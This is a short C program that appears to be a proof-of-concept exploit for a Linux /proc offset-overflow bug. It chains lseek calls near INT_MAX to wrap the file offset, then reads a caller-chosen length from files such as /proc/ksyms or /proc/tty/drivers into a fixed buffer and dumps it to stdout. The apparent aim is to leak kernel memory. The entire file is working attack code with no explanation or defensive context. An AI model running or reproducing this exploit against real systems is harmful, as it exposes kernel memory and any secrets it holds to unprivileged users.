#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <limits.h>
#include <fcntl.h>

/* CBF to make this work better */
/*
	/proc/ksyms
	/proc/net/rt_acct
	/proc/tty/drivers
	/proc/tty/ldiscs
*/

#define PROC_BLOCK_SIZE		(3*1024)

int
main(int argc, char *argv[])
{
	size_t offset;
	size_t len;
	int fd;
	int ret;
	char buf[PROC_BLOCK_SIZE];

	if (argc != 4) exit(1);
	if ((fd = open(argv[1], O_RDONLY)) == -1) exit(1);
	offset = strtoul(argv[2], NULL, 10);
	len = strtoul(argv[3], NULL, 10);
#define A	200
	ret = lseek(fd, INT_MAX - A, SEEK_SET);
	ret = lseek(fd, INT_MAX - A, SEEK_CUR);
	ret = lseek(fd, 2*A + offset - PROC_BLOCK_SIZE, SEEK_CUR);
#undef  A
	ret = read(fd, buf, len);
	write(1, buf, len);
	exit(0);
}
